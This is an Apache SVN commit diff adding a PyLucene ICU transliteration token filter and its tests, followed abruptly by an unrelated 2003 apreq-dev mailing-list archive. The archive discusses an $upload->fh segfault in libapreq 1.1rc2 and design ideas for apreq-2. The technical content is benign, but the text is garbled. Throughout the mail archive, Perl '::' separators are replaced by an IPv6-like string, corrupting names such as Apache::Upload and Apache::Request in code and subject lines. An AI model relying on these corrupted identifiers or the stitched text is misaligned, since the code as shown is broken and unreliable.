License. +# ==================================================================== +# +# Port of java/org/apache/lucene/analysis/icu/ICUTransformFilter.java +# using IBM's C++ ICU wrapped by PyICU (http://pyicu.osafoundation.org) +# +# A TokenFilter that transforms text with ICU. +# +# ICU provides text-transformation functionality via its Transliteration API. +# Although script conversion is its most common use, a Transliterator can +# actually perform a more general class of tasks. In fact, Transliterator +# defines a very general API which specifies only that a segment of the input +# text is replaced by new text. The particulars of this conversion are +# determined entirely by subclasses of Transliterator. +# +# Some useful transformations for search are built-in: +# - Conversion from Traditional to Simplified Chinese characters +# - Conversion from Hiragana to Katakana +# - Conversion from Fullwidth to Halfwidth forms. +# - Script conversions, for example Serbian Cyrillic to Latin +# +# Example usage: <blockquote>stream = new ICUTransformFilter(stream, +# Transliterator.getInstance("Traditional-Simplified"));</blockquote> +# +# For more details, see the ICU User Guide at: +# http://userguide.icu-project.org/transforms/general +# +# ==================================================================== + +from lucene import PythonTokenFilter, CharTermAttribute +from icu import Transliterator, UTransPosition + + +class ICUTransformFilter(PythonTokenFilter): + + # Create a new ICUTransformFilter that transforms text on the given + # stream. + # + # @param input {@link TokenStream} to filter. + # @param transform Transliterator to transform the text. + + def __init__(self, input, transform): + + super(ICUTransformFilter, self).__init__(input) + + # Reusable position object + self.position = UTransPosition() + + # term attribute, will be updated with transformed text. + self.termAtt = self.addAttribute(CharTermAttribute.class_) + + self.input = input + self.transform = transform + + def incrementToken(self): + + if self.input.incrementToken(): + text = self.termAtt.toString() + length = len(text) + + self.position.start = 0 + self.position.limit = length + self.position.contextStart = 0 + self.position.contextLimit = length + + text = self.transform.filteredTransliterate(text, self.position, + False) + self.termAtt.setEmpty() + self.termAtt.append(text) + + return True + + return False Propchange: lucene/pylucene/trunk/python/ICUTransformFilter.py ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/python/ICUTransformFilter.py ------------------------------------------------------------------------------ svn:mime-type = text/plain Added: lucene/pylucene/trunk/test/test_ICUTransformFilter.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/test/test_ICUTransformFilter.py?rev=938638&view=auto ============================================================================== --- lucene/pylucene/trunk/test/test_ICUTransformFilter.py (added) +++ lucene/pylucene/trunk/test/test_ICUTransformFilter.py Tue Apr 27 20:27:07 2010 @@ -0,0 +1,92 @@ +# -*- coding: utf-8 -*- +# ==================================================================== +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# ==================================================================== +# +# Port of java/org/apache/lucene/analysis/icu/ICUTransformFilter.java +# using IBM's C++ ICU wrapped by PyICU (http://pyicu.osafoundation.org) + +try: + from icu import Transliterator, UTransDirection +except ImportError, e: + pass + +from unittest import main +from BaseTokenStreamTestCase import BaseTokenStreamTestCase + +from lucene import * +from lucene.ICUTransformFilter import ICUTransformFilter + + +class TestICUTransformFilter(BaseTokenStreamTestCase): + + def _checkToken(self, transform, input, expected): + + ts = ICUTransformFilter(KeywordTokenizer(StringReader(input)), + transform) + self._assertTokenStreamContents(ts, [ expected ]) + + def _getTransliterator(self, name): + + return Transliterator.createInstance(name, UTransDirection.FORWARD) + + def testBasicFunctionality(self): + + self._checkToken(self._getTransliterator("Traditional-Simplified"), + u"簡化字", u"简化字") + self._checkToken(self._getTransliterator("Katakana-Hiragana"), + u"ヒラガナ", u"ひらがな") + self._checkToken(self._getTransliterator("Fullwidth-Halfwidth"), + u"アルアノリウ", u"アルアノリウ") + self._checkToken(self._getTransliterator("Any-Latin"), + u"Αλφαβητικός Κατάλογος", u"Alphabētikós Katálogos") + self._checkToken(self._getTransliterator("NFD; [:Nonspacing Mark:] Remove"), + u"Alphabētikós Katálogos", u"Alphabetikos Katalogos") + self._checkToken(self._getTransliterator("Han-Latin"), + u"中国", u"zhōng guó") + + def testCustomFunctionality(self): + + # convert a's to b's and b's to c's + rules = "a > b; b > c;" + self._checkToken(Transliterator.createFromRules("test", rules, UTransDirection.FORWARD), "abacadaba", "bcbcbdbcb") + + def testCustomFunctionality2(self): + + # convert a's to b's and b's to c's + rules = "c { a > b; a > d;" + self._checkToken(Transliterator.createFromRules("test", rules, UTransDirection.FORWARD), "caa", "cbd") + + def testOptimizer2(self): + + self._checkToken(self._getTransliterator("Traditional-Simplified; Lower"), + "ABCDE", "abcde") + + +if __name__ == "__main__": + import sys, lucene + try: + import icu + except ImportError: + pass + else: + lucene.initVM() + if '-loop' in sys.argv: + sys.argv.remove('-loop') + while True: + try: + main() + except: + pass + else: + main() Propchange: lucene/pylucene/trunk/test/test_ICUTransformFilter.py ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/test/test_ICUTransformFilter.py ------------------------------------------------------------------------------ svn:mime-type = text/plain
From [email protected] Wed Jan 01 22:27:45 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94419 invoked by uid 500); 1 Jan 2003 22:27:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 94402 invoked from network); 1 Jan 2003 22:27:44 -0000 Message-ID: <[email protected]> Date: Thu, 02 Jan 2003 09:28:04 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Sven Geisler <[email protected]> Cc: [email protected] Subject: Re: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 References: <1041256922.17229.82.camel@andes> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Sven Geisler wrote: > Hi, > > I use libapreq 1.1rc2 with self-compiled perl 5.8.0, mod_perl 1.27, > apache 1.3.27: > > my Perl code: > > if ($r->method_number == Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bConstantsacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bM_POST) { > foreach my $upload ($r->upload) { > my $name = $upload->name; > if (ref($upload->fh)) { > # do something with upload > ... > } > } > > # do more > ... > } > > I got this message in gdb: > > Program received signal SIGSEGV, Segmentation fault. > [Switching to Thread 8192 (LWP 25219)] > 0x420693d7 in fileno_unlocked () from /lib/i686/libc.so.6 Thank you, Sven, for the diagnosis and patch, which should be certainly fixed. But this shouldn't have happened in first place, $upload->fh shouldn't be set if there is no file to upload. Any chance you can supply a reproducable showcase which reproduces this segfault? Because the problem with this patch: fp = ApacheUpload_fh(upload); if ( !fp ) XSRETURN_UNDEF; is that the client code expects a file, and we return undef here. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Thu Jan 02 20:27:00 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19504 invoked by uid 500); 2 Jan 2003 20:26:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 19493 invoked from network); 2 Jan 2003 20:26:59 -0000 To: David Wheeler <[email protected]> Cc: Ken Williams <[email protected]>, [email protected], apreq list <[email protected]> Subject: Re: Testing libapreq References: <[email protected]> From: Joe Schaefer <[email protected]> Date: 02 Jan 2003 15:32:48 -0500 In-Reply-To: David Wheeler's message of "Thu, 2 Jan 2003 12:13:37 -0800" Message-ID: <[email protected]> Lines: 23 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N [cc'd to apreq-dev] David Wheeler <[email protected]> writes: [...] > In the meantime, I enclose the latest version of INSTALL.MacOSX with > the changes we've discussed. For those who don't see the attachments, > you can also download it from > http://david.wheeler.net/apreq/INSTALL.MacOSX. I just committed this version to cvs, so future versions of INSTALL.MacOSX should be posted to apreq-dev as diff's against cvs. One easy way is to checkout a public copy from cvs, make the necessary edits, and then generate the patch by typing % cvs diff INSTALL.MacOSX Thanks alot, David! -- Joe Schaefer From [email protected] Fri Jan 03 03:36:38 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76701 invoked by uid 500); 3 Jan 2003 03:36:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 76690 invoked from network); 3 Jan 2003 03:36:37 -0000 To: apreq list <[email protected]> Subject: [rfc] some thoughts for apreq-2 From: Joe Schaefer <[email protected]> Date: 02 Jan 2003 22:42:30 -0500 Message-ID: <[email protected]> Lines: 76 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N After experimenting with a few different designs regarding new data apreq-2, I've settled on the following concepts for our new data structures: 1) apreq_tables will be the common data structure for both req->param and apreq_cookie_jar. apreq_tables still return a char* via apreq_table_get(), but it's an "enhanced" char*... 2) the apreq_value_t is the (extensible) internal struct for the table values: struct apreq_value_t { apr_ssize_t size; char data[1]; /* see comp.lang.c FAQ #2.6 */ } apreq_table_get() returns a pointer to the "data" string; the size attribute is obtainable through ANSI C's offsetof(). 3) parsers will extend apreq_value_t by placing it at the *end* of their own structs, since the tail of apreq_value_t is reserved for the data itself. Although these choices may seem strange at first, I think they offer a good compromise between backwards compatibility, speed, and a better string type for applications that need it. Originally I was considering using apreq_value_t * throughout the apreq_table API, but it made the API too cumbersome for *typical* usage (I felt there was too much pointer checking & dereferencing). Here's how I'm planning to use it for apreq_cookies: struct apreq_cookie_t { char *name; char *value; /* typically points to v.data (see below) */ char *path; char *domain; int max_age; char *comment; char *commentURL; char *port; char secure; apreq_cookie_version_t version; /* XXX does this belong here? */ char *pool; apreq_cookie_encode_t *encode; apreq_cookie_decode_t *decode; void *cache; /* decoded value (cached) */ unsigned char sync; /* coordinate state of value and cache */ apreq_value_t v; /* original "raw" value */ }; We parse the incoming "Cookie" header (via apreq_cookie_parse) into a cookie_jar, which is just an apreq_table with enhanced values. This makes the API for fetching raw cookie values extremely simple: apreq_cookie_jar_t *jar = apreq_cookie_parse(r, NULL); const char *my_cval = apreq_table_get( jar, "mycookie" ); /* decode my_cval... */ Since we only need to parse the "Cookie" header once per request, I think we should store a pointer to the jar in r->notes, presumably using "apreq_cookie_jar" as key. I also plan to use r->notes for storing a pointer to our apreq_filter, unless someone has a better idea. Comments? -- Joe Schaefer From [email protected] Fri Jan 03 16:42:58 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13049 invoked by uid 500); 3 Jan 2003 16:42:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 13038 invoked from network); 3 Jan 2003 16:42:57 -0000 To: Eli Marmor <[email protected]> Cc: apreq list <[email protected]> Subject: Re: [rfc] some thoughts for apreq-2 References: <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 03 Jan 2003 11:48:45 -0500 Message-ID: <[email protected]> Lines: 64 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N [cc'd discussion to apreq-dev list] Eli Marmor <[email protected]> writes: > The main idea is to use the filtering mechanism to its limits, so apreq > can: > > 1. be used by modules from most of the layers (except for, obviously, > the CONNECTION layer - i.e. SSL and gzip...) Right- the idea is to make the parsed data available to the request (input and output) filters, as well as the content handler itself. > 2. change values and not only read them (maybe the following is > possible: when an input filter is pushing the bucket-brigades to the > following filter, after it modified the apreq tables, the POST data > (or the GET after the "?") will be rewritten to reflect the new > values. You can do that already, but it's 1) cumbersome, since apache tables aren't designed for fast deletes. 2) IMO not a good idea, since it amounts to lying to *other* apps about the actual client data. In very rare cases (e.g. a broken browser) it might be necessary to do that, but I can't think of a good reason why apreq users should *want* to modify table entries. The same thing goes for incoming cookies. > 3. be separated into two layers, one of them independent of Apache (but > only depends on APR). It allows external programs (such as CGI's and > FastCGI) to use it. I think it's possible to embed a home-brewed "request_rec" into an application, that basically tricks libapreq into thinking it is running inside httpd. With apreq-2, there'd be a bit more work to do that since httpd's filter API would need emulation also. It's not something that interests me personally, but if you'd like to see this happen, I'm not opposed to it either. Some portions of apreq-2 could go into APR, but apreq is very much tied to HTTP. After looking over my current code, I don't expect the "generically useful for APR*" portion to amount to very much. TENTATIVE ROADMAP for apreq-2: Barring unforeseen events :-), I'd like to put up an apreq-2 repository on cvs.apache.org in the next few days. A functional filter implementation isn't far off now; IOW I expect the C API to be reasonably polished by the end of January. Assuming we're all basically satisfied with it by then, we can lock down the core API at the end of this month, and let the application programmers (especially the language-gluers) do their thing with apreq-2. -- Joe Schaefer From [email protected] Sat Jan 04 19:25:42 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20818 invoked by uid 500); 4 Jan 2003 19:25:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 20806 invoked from network); 4 Jan 2003 19:25:40 -0000 Sender: [email protected] Message-ID: <[email protected]> Date: Sat, 04 Jan 2003 21:20:01 +0200 From: Eli Marmor <[email protected]> Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: apreq list <[email protected]> Subject: Re: [rfc] some thoughts for apreq-2 References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > [cc'd discussion to apreq-dev list] It may be useful to quote the rest of my e-mail, although it is a quotation of a little old message: ----------------------------------------------------------------------- Hi, I forward an e-mail discussion between Stas and me. It contains a proposal (the lines with the 1-level ">"), which some of its parts are not new, and were discussed in the past. I asked Stas' permission to forward it to you. The purposes of the proposal: 1. Allow libapreq to serve not only Apache modules, but also CGI's and FastCGI's (the entire proposal refers only to apreq-2, which is based on APR (or - to be exact - supposed to be based on APR...)). 2. Allow libapreq to be both: a consumer of parameters (and/or cookies) AND a filter of them (not only for mod_proxy, but also to manipulate values on their way to an internal module). The work which has been done so far on the porting to 2.0, shortens our way drammatically. A possibility that is not mentioned in the proposal, is to split the 2 layers to 2 different locations: 1. The low layer, which is dependent on APR but not on Apache, will be inserted into APR. 2. The high layer, which depends on Apache (brigades etc.), will be placed in a new directory under the "modules" directory (or even under the "server" directory). The original discussion is attached (forwarded). I don't use an open forum (like the mailing list), to avoid too much noise. Date: Wed, 11 Dec 2002 10:17:47 +0800 From: Stas Bekman <[email protected]> To: Eli Marmor <[email protected]> Subject: Re: Opinion about libapreq Eli Marmor wrote: > It's funny; > After I sent you the question, and before receiving your response, I > started to investigate apreq, concluding with what you answered, plus > many other conclusions and ideas. Then, I looked at the archives of the > mailing list, and was surprised to see that most of the things that I > thought or found, were already discussed. > > In general, the ideal could be if apreq-2 would be separated into two > layers: > > 1. The lower one: independent of Apache, but dependent on APR (it's a > piece of cake to port all the "ap_" to "apr_"). In this layer, there The reason that ap_ is used instead of apr_, is because there is no apr_ equivalent. > will be no manipulation or access to request_rec or input_filters, > but simple parameters like a string with the params (in case of a > GET - the URL content after the "?", and in the case of POST - the > following input, including multipart), APR table of the headers, etc > > 2. The higher layer, on top of the lower: with a similar functionality > of the current libapreq, plus the following: 2 modes of "read" (one > of the "consumes" the parameters - like CGI - while the other one > passes them to the next consumer). Possible "set"/"add"/"unset" of > params, so the next consumer (or backend in the case of a proxy or > reverse proxy) will be eaten different parameters than the originals > that were typed in by the browser's user. > > If this is accomplished, it is easy to write a simple and thin layer > library for CGI's, that will check the method (GET/POST), take the > QUERY_STRING or the input data (according to the method), build an APR > table of the headers, and call the (above) low layer. Of course, it > will force the users of this library to link APR to their CGI (and of > course libapreq). Joe has already started working on hookable parsers for example. So you can install your own parser to massage the data. I think he did it to handle xml. > It will also be easy to write a simple and thin layer library for > FastCGI. > > And a special mode of that layers (CGI/FastCGI) will run the CGI's/ > FastCGI's directly, without passing any browser/Apache/server, allowing > higher levels of debugging, profiling and tuning (input parameters will > be eaten using the command line flags or the standard input). > > All of these "TODO's" are not a dream; Actually, I already did most of > them for CGIC, but I think that libapreq has a more promising future, > so I'll love to see them here. I can help, but this effort is more than > what I can do alone. Especially when there are people who are more > expert than me in APR, filters, and libapreq internals. > > If you are interested, I'll love to be in a more interactive connection > regarding these issues (chat? phone?). Maybe even in Hebrew ;-) > (unless you forgot your Hebrew... ;-) Sure, we can discuss this interactively. But I'd rather see this discussion on the apreq list. Especially since Joe had quite a few similar ideas. I guess I'd really want to have at least Joe being involved in this discussion, but I'm sure that others would like to say a word too. So we need to discuss what we want, lay out a roadmap, write a spec and start implementing things. >>>Just one last question before digging into apreq-2: >>> >>>Can it work also standalone (linked with APR, of course)? >>>Or just as a part of Apache2? >> >>It can't, because it uses ap_ calls. Though if there is an interest it should >>be possible to abstract certaint calls so that it doesn't require Apache anymore. >> >>It's tied to Apache for 3 reasons: >> >>* Certain functions should live in apr_ but they ap_ >>* Reading from the client is currently implemented ap_get_client_block, but >>should be easy to abstract away >>* logging is done via ap_log_rerror, but again can be easily abstracted away. >> >>So in my opinion it should be quite easy to make the lib independent of Apache. >> >> >>>In case it can, do you have any idea if this is going to change? >>>(for example, Joe might port it to filtered-IO, without keeping backward >>>compatibility, in a way that will prevent it from being run standalone). >> >>All these features can be optional. The library should be still usable as it >>is now (plus as you suggest to be apr_ only dependent, if you give a hand to >>accomplish that). The filtering IO is really just the way to feed the parser, >>there could be several feeding services available. > Eli Marmor <[email protected]> writes: > > > The main idea is to use the filtering mechanism to its limits, so apreq > > can: > > > > 1. be used by modules from most of the layers (except for, obviously, > > the CONNECTION layer - i.e. SSL and gzip...) > > Right- the idea is to make the parsed data available to the > request (input and output) filters, as well as the content > handler itself. > > > 3. be separated into two layers, one of them independent of Apache (but > > only depends on APR). It allows external programs (such as CGI's and > > FastCGI) to use it. > > I think it's possible to embed a home-brewed "request_rec" into an > application, that basically tricks libapreq into thinking it is running > inside httpd. With apreq-2, there'd be a bit more work to do that since > httpd's filter API would need emulation also. It's not something that > interests me personally, but if you'd like to see this happen, I'm > not opposed to it either. > > Some portions of apreq-2 could go into APR, but apreq is very much > tied to HTTP. After looking over my current code, I don't expect > the "generically useful for APR*" portion to amount to very much. > > TENTATIVE ROADMAP for apreq-2: > > Barring unforeseen events :-), I'd like to put up an apreq-2 > repository on cvs.apache.org in the next few days. A functional > filter implementation isn't far off now; IOW I expect the C API to > be reasonably polished by the end of January. > > Assuming we're all basically satisfied with it by then, we can lock > down the core API at the end of this month, and let the application > programmers (especially the language-gluers) do their thing with > apreq-2. -- Eli Marmor [email protected] CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: 970-824-1244 8 Yad-Harutzim St. Fax.: 970-824-1244 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel From [email protected] Sun Jan 05 17:41:21 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3519 invoked by uid 500); 5 Jan 2003 17:41:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 3508 invoked from network); 5 Jan 2003 17:41:21 -0000 Date: Sun, 5 Jan 2003 18:41:08 +0100 Mime-Version: 1.0 (Apple Message framework v551) Content-Type: text/plain; charset=US-ASCII; format=flowed Subject: Fwd: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 From: Sven Geisler <[email protected]> To: [email protected] Content-Transfer-Encoding: 7bit Message-Id: <[email protected]> X-Mailer: Apple Mail (2.551) X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N > Von: Sven Geisler <[email protected]> > Datum: Sa, 4. Jan 2003 17:29:59 Europe/Berlin > An: Stas Bekman <[email protected]> > Betreff: Re: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 > > Hi Stas, > > Am Mittwoch, 01.01.03 um 23:28 Uhr schrieb Stas Bekman: >> Sven Geisler wrote: >>> Hi, >>> I use libapreq 1.1rc2 with self-compiled perl 5.8.0, mod_perl 1.27, >>> apache 1.3.27: >>> my Perl code: >>> if ($r->method_number == Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bConstantsacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bM_POST) { >>> foreach my $upload ($r->upload) { >>> my $name = $upload->name; >>> if (ref($upload->fh)) { >>> # do something with upload >>> ... >>> } >>> } >>> # do more >>> ... >>> } >>> I got this message in gdb: >>> Program received signal SIGSEGV, Segmentation fault. >>> [Switching to Thread 8192 (LWP 25219)] >>> 0x420693d7 in fileno_unlocked () from /lib/i686/libc.so.6 >> >> Thank you, Sven, for the diagnosis and patch, which should be >> certainly fixed. But this shouldn't have happened in first place, >> $upload->fh shouldn't be set if there is no file to upload. Any >> chance you can supply a reproducable showcase which reproduces this >> segfault? Because the problem with this patch: >> >> fp = ApacheUpload_fh(upload); >> if ( !fp ) >> XSRETURN_UNDEF; >> >> is that the client code expects a file, and we return undef here. >> > > $upload->fh was set to zero (from init). Without my patch the perl > code $upload->fh produced a segfault. Regarding your comment my > questions is: how do I find out that there is a uploaded file? > > More about my circumstances: > I use a html form (multipart form data) with two file upload fields. I > got a segfault with $upload->fh if the user selects no files. I use > $upload->fh to find out if there is a upload. My patch is for this > case. > I got another segfault if the user select a file. My handler receives > the file. This request handled well. I got a segfault with the next > request on this process. This looks like the same segfault that I saw > with libapreq 1.0 and perl 5.8.0. > > I hope that I have more time next week to say more about this problem. > > Sven. > From [email protected] Sun Jan 05 18:34:42 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30308 invoked by uid 500); 5 Jan 2003 18:34:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 30295 invoked from network); 5 Jan 2003 18:34:41 -0000 To: Sven Geisler <[email protected]> Cc: [email protected] Subject: Re: Fwd: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 References: <[email protected]> From: Joe Schaefer <[email protected]> Date: 05 Jan 2003 13:40:36 -0500 In-Reply-To: Sven Geisler's message of "Sun, 5 Jan 2003 18:41:08 +0100" Message-ID: <[email protected]> Lines: 55 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Sven Geisler <[email protected]> writes: > > An: Stas Bekman <[email protected]> > > Betreff: Re: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 [...] > >> fp = ApacheUpload_fh(upload); > >> if ( !fp ) > >> XSRETURN_UNDEF; > >> > >> is that the client code expects a file, and we return undef here. > >> > > > > $upload->fh was set to zero (from init). Without my patch the perl > > code $upload->fh produced a segfault. Regarding your comment my > > questions is: how do I find out that there is a uploaded file? If there's no files being uploaded, $r->upload will return an empty list (in list context). In scalar context, $r->upload *should* return an undef in this situation (I'm not sure it actually does that, though). > > More about my circumstances: > > I use a html form (multipart form data) with two file upload fields. I > > got a segfault with $upload->fh if the user selects no files. I use > > $upload->fh to find out if there is a upload. My patch is for this > > case. Preventing a segfault here is prudent, so I definitely agree that we need to incorporate this fix into 1.1. However, this situation *should not* happen, unless either 1) an error occurred during parsing (look in $apr->status?), 2) you're using an UPLOAD_HOOK, and the hook function isn't creating the necessary tempfiles. If neither of these are true, uploads should always have non-null tempfiles attached, and $upload->fh should not segfault. > > I got another segfault if the user select a file. My handler receives > > the file. This request handled well. I got a segfault with the next > > request on this process. This looks like the same segfault that I saw > > with libapreq 1.0 and perl 5.8.0. We need to see a stack trace of the core (I suspect a duped filehandle is being freed twice, but I haven't been able to get my box to segfault yet). Once again, would you please post the particulars so apreq-dev can collectively figure this issue out? Thanks. -- Joe Schaefer From [email protected] Sun Jan 05 20:00:43 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71295 invoked by uid 500); 5 Jan 2003 20:00:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 71284 invoked from network); 5 Jan 2003 20:00:42 -0000 Date: Sun, 5 Jan 2003 21:00:39 +0100 Subject: Re: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v551) Cc: [email protected] To: Joe Schaefer <[email protected]> From: Sven Geisler <[email protected]> In-Reply-To: <[email protected]> Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit X-Mailer: Apple Mail (2.551) X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hi Joe, Am Sonntag, 05.01.03 um 19:40 Uhr schrieb Joe Schaefer: >>> More about my circumstances: >>> I use a html form (multipart form data) with two file upload fields. >>> I >>> got a segfault with $upload->fh if the user selects no files. I use >>> $upload->fh to find out if there is a upload. My patch is for this >>> case. > > Preventing a segfault here is prudent, so I definitely agree that > we need to incorporate this fix into 1.1. However, this situation > *should not* happen, unless either > > 1) an error occurred during parsing (look in $apr->status?), > 2) you're using an UPLOAD_HOOK, and the hook function isn't > creating the necessary tempfiles. > > If neither of these are true, uploads should always have non-null > tempfiles attached, and $upload->fh should not segfault. Yes, I use a UPLOAD_HOOK to get information during the upload - like the transparent_hook example in the doc. I use the same function with libapreq 1.0 with no problems. Here my code: (inquriry/handler is my internal object. The method var provides access to my internal data store.) $UPLOADHOOK = sub { my ($upload, $buffer, $length, $hook_data) = @_; my $inquiry = ${$hook_data}; if (ref($inquiry)) { my $info = $inquiry->var('V_UPLOADINFO') || {}; if ($info->{'name'} ne $upload->name) { $info->{'name'} = $upload->name; $info->{'file'} = $upload->filename; $info->{'temp'} = $upload->tempname; $info->{'time'} = time; my $r = $inquiry->var('V_REQUEST'); $info->{'size'} = $r->header_in('Content-Length'); #warn "upload hook ($$): '", join(q{', '}, %{$info}), "'\n"; $inquiry->var('V_UPLOADINFO', $info); $inquiry->var('S_UPLOADINFO', $info, 'sessionpersistent'); } } }; .... # create Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest object my $ar = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest->instance($r, DISABLE_UPLOADS => 0, # allow uploads POST_MAX => 268435456, # max. 256 MByte HOOK_DATA => \$HANDLER, UPLOAD_HOOK => $UPLOADHOOK, TEMP_DIR => $ENV{'CSHOME'}.'/spool' ); > >>> I got another segfault if the user select a file. My handler receives >>> the file. This request handled well. I got a segfault with the next >>> request on this process. This looks like the same segfault that I saw >>> with libapreq 1.0 and perl 5.8.0. > > We need to see a stack trace of the core (I suspect a duped > filehandle is being freed twice, but I haven't been able to get > my box to segfault yet). Once again, would you please post the > particulars so apreq-dev can collectively figure this issue out? Do we need more information from the gdb? I still get no core dumps. I was trying all tips. I use gdb to get the stack trace. My apache start with ca. 40 MByte (each process). The apache processes run with a normal user account. Do you need more information about the circumstances? I will create the stack trace of the second segfault tomorrow... Thx for you help... Regards Sven. From [email protected] Sun Jan 05 20:40:59 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94021 invoked by uid 500); 5 Jan 2003 20:40:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email 